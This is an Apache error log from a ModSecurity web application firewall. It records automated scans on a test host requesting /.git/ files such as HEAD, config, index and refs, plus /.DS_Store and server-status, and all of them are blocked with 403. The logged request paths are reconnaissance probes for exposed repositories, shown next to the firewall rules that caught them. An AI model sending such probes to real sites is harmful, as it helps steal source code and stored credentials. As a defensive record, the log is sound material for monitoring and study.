[Sat Nov 15 00:42:03.635491 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aRe-SzDQC5l9nKxKkhTnDAAAAAs"]
[Sat Nov 15 00:42:03.635744 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aRe-SzDQC5l9nKxKkhTnDAAAAAs"]
[Sat Nov 15 00:42:03.635924 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aRe-SzDQC5l9nKxKkhTnDAAAAAs"]
[Sat Nov 15 00:42:03.658726 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/orig_head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/ORIG_HEAD"] [unique_id "aRe-SzDQC5l9nKxKkhTnDQAAAAs"]
[Sat Nov 15 00:42:03.658909 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/ORIG_HEAD"] [unique_id "aRe-SzDQC5l9nKxKkhTnDQAAAAs"]
[Sat Nov 15 00:42:03.659050 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/ORIG_HEAD"] [unique_id "aRe-SzDQC5l9nKxKkhTnDQAAAAs"]
[Sat Nov 15 00:42:03.690027 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects/info/packs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/objects/info/packs"] [unique_id "aRe-SzDQC5l9nKxKkhTnDgAAAAs"]
[Sat Nov 15 00:42:03.690199 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/objects/info/packs"] [unique_id "aRe-SzDQC5l9nKxKkhTnDgAAAAs"]
[Sat Nov 15 00:42:03.690369 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/objects/info/packs"] [unique_id "aRe-SzDQC5l9nKxKkhTnDgAAAAs"]
[Sat Nov 15 00:42:03.711494 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/index"] [unique_id "aRe-SzDQC5l9nKxKkhTnDwAAAAs"]
[Sat Nov 15 00:42:03.711652 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/index"] [unique_id "aRe-SzDQC5l9nKxKkhTnDwAAAAs"]
[Sat Nov 15 00:42:03.711789 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/index"] [unique_id "aRe-SzDQC5l9nKxKkhTnDwAAAAs"]
[Sat Nov 15 00:42:03.738461 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRe-SzDQC5l9nKxKkhTnEAAAAAs"]
[Sat Nov 15 00:42:03.738687 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRe-SzDQC5l9nKxKkhTnEAAAAAs"]
[Sat Nov 15 00:42:03.738872 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRe-SzDQC5l9nKxKkhTnEAAAAAs"]
[Sat Nov 15 00:42:04.548470 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/info/exclude"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/info/exclude"] [unique_id "aRe-TDDQC5l9nKxKkhTnEQAAAAs"]
[Sat Nov 15 00:42:04.548698 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/info/exclude"] [unique_id "aRe-TDDQC5l9nKxKkhTnEQAAAAs"]
[Sat Nov 15 00:42:04.548911 2025] [:error] [pid 75369] [client 45.148.10.246:41872] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/info/exclude"] [unique_id "aRe-TDDQC5l9nKxKkhTnEQAAAAs"]
[Sat Nov 15 00:42:07.941682 2025] [:error] [pid 75370] [client 45.148.10.246:39998] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/fetch_head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/FETCH_HEAD"] [unique_id "aRe-Tw1h8qDw08A4-zICOgAAAAw"]
[Sat Nov 15 00:42:07.941916 2025] [:error] [pid 75370] [client 45.148.10.246:39998] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/FETCH_HEAD"] [unique_id "aRe-Tw1h8qDw08A4-zICOgAAAAw"]
[Sat Nov 15 00:42:07.942115 2025] [:error] [pid 75370] [client 45.148.10.246:39998] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/FETCH_HEAD"] [unique_id "aRe-Tw1h8qDw08A4-zICOgAAAAw"]
[Sat Nov 15 00:42:08.062414 2025] [:error] [pid 75370] [client 45.148.10.246:39998] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/refs/heads/master"] [unique_id "aRe-UA1h8qDw08A4-zICOwAAAAw"]
[Sat Nov 15 00:42:08.062635 2025] [:error] [pid 75370] [client 45.148.10.246:39998] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/refs/heads/master"] [unique_id "aRe-UA1h8qDw08A4-zICOwAAAAw"]
[Sat Nov 15 00:42:08.062812 2025] [:error] [pid 75370] [client 45.148.10.246:39998] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/refs/heads/master"] [unique_id "aRe-UA1h8qDw08A4-zICOwAAAAw"]
[Sat Nov 15 00:42:09.591269 2025] [:error] [pid 75371] [client 45.148.10.246:40004] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/refs/heads/main"] [unique_id "aRe-Ud4SPjsqLXqXH-Vg8wAAAA0"]
[Sat Nov 15 00:42:09.591481 2025] [:error] [pid 75371] [client 45.148.10.246:40004] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/refs/heads/main"] [unique_id "aRe-Ud4SPjsqLXqXH-Vg8wAAAA0"]
[Sat Nov 15 00:42:09.591681 2025] [:error] [pid 75371] [client 45.148.10.246:40004] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/refs/heads/main"] [unique_id "aRe-Ud4SPjsqLXqXH-Vg8wAAAA0"]
[Sat Nov 15 00:42:10.582149 2025] [:error] [pid 75371] [client 45.148.10.246:40004] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/remotes/origin/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "aRe-Ut4SPjsqLXqXH-Vg9AAAAA0"]
[Sat Nov 15 00:42:10.582393 2025] [:error] [pid 75371] [client 45.148.10.246:40004] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "aRe-Ut4SPjsqLXqXH-Vg9AAAAA0"]
[Sat Nov 15 00:42:10.582578 2025] [:error] [pid 75371] [client 45.148.10.246:40004] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "aRe-Ut4SPjsqLXqXH-Vg9AAAAA0"]
[Sat Nov 15 00:44:59.429055 2025] [:error] [pid 75386] [client 56.155.78.66:55788] [client 56.155.78.66] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRe--w45q16zgndymTMyKQAAAAE"]
[Sat Nov 15 00:44:59.429344 2025] [:error] [pid 75386] [client 56.155.78.66:55788] [client 56.155.78.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRe--w45q16zgndymTMyKQAAAAE"]
[Sat Nov 15 00:44:59.429503 2025] [:error] [pid 75386] [client 56.155.78.66:55788] [client 56.155.78.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRe--w45q16zgndymTMyKQAAAAE"]
[Sat Nov 15 00:44:59.431026 2025] [:error] [pid 75369] [client 56.155.78.66:55780] [client 56.155.78.66] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRe--zDQC5l9nKxKkhTnEwAAAAs"]
[Sat Nov 15 00:44:59.431230 2025] [:error] [pid 75369] [client 56.155.78.66:55780] [client 56.155.78.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRe--zDQC5l9nKxKkhTnEwAAAAs"]
[Sat Nov 15 00:44:59.431375 2025] [:error] [pid 75369] [client 56.155.78.66:55780] [client 56.155.78.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRe--zDQC5l9nKxKkhTnEwAAAAs"]
[Sat Nov 15 11:36:29.265479 2025] [authz_core:error] [pid 87617] [client 206.81.12.187:60614] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Nov 15 11:36:30.265191 2025] [:error] [pid 87620] [client 206.81.12.187:60642] [client 206.81.12.187] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRhXruO0i7wwT9XI32djigAAAAk"]
[Sat Nov 15 11:36:30.265433 2025] [:error] [pid 87620] [client 206.81.12.187:60642] [client 206.81.12.187] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRhXruO0i7wwT9XI32djigAAAAk"]
[Sat Nov 15 11:36:30.265592 2025] [:error] [pid 87620] [client 206.81.12.187:60642] [client 206.81.12.187] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRhXruO0i7wwT9XI32djigAAAAk"]
